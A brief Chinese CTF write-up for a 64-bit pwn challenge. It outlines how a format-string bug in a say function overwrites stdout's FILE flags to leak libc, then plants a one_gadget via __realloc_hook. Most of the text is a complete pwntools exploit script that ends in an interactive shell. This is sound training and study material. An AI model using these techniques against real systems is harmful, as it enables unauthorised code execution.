note
64位,全保护,使用libc-2.23.so
Tag: scanf字符串格式化洞 IO_File
思路
- 利用
say函数的scanf字符串格式化漏洞对IO_FILE的stdout进行写入,改小flag位置,从而进行libc_leak - 再次利用此漏洞向
malloc_hook写入one_gadget - og栈帧条件不满足,使用realloc微调
TIPS:任何使用格式化字符串的函数均存在这一漏洞
EXP
from pwn import *
import sys
name = sys.argv[1]
elf = ELF(name)
libc = elf.libc
sh = 0
l64 = lambda :u64(sh.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(sh.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :sh.sendlineafter(str(a),str(b))
sa = lambda a,b :sh.sendafter(str(a),str(b))
lg = lambda name,data : sh.success(name + ": 0x%x" % data)
se = lambda payload: sh.send(payload)
rl = lambda : sh.recv()
sl = lambda payload: sh.sendline(payload)
ru = lambda a :sh.recvuntil(str(a))
def cmd(ch):
sla("choice: ",ch)
def main(ip,port,debug,mode):
global sh
if debug==0:
context.log_level = "debug"
else:
pass
if mode==0:
sh = process(name)
else:
sh = remote(ip,port)
cmd(2)
sa("say ? ","%7$s\x00")
sh.sendline(p64(0xfbad1800)+p64(0)*3)
libcbase = u64(ru("\x7f")[-6:].ljust(8,"\x00"))-0x3c36e0
malloc_hook = libcbase+libc.sym["__malloc_hook"]
realloc_hook = libcbase + libc.sym["__realloc_hook"]
realloc = libcbase + libc.sym["realloc"]
og = libcbase + 0x4527a
lg("libcbase",libcbase)
lg("malloc_hook",malloc_hook)
lg("og",og)
lg("realloc",realloc)
lg("realloc_hook",realloc_hook)
cmd(2)
sh.sendlineafter("say ? ","%7$s"+"\x00"*4+p64(realloc_hook))
sh.sendlineafter("? ",p64(og)+p64(realloc+6))
cmd(1)
sla("size: ",0x10)
sh.interactive()
if __name__ == '__main__':
main(0,0,0,0)
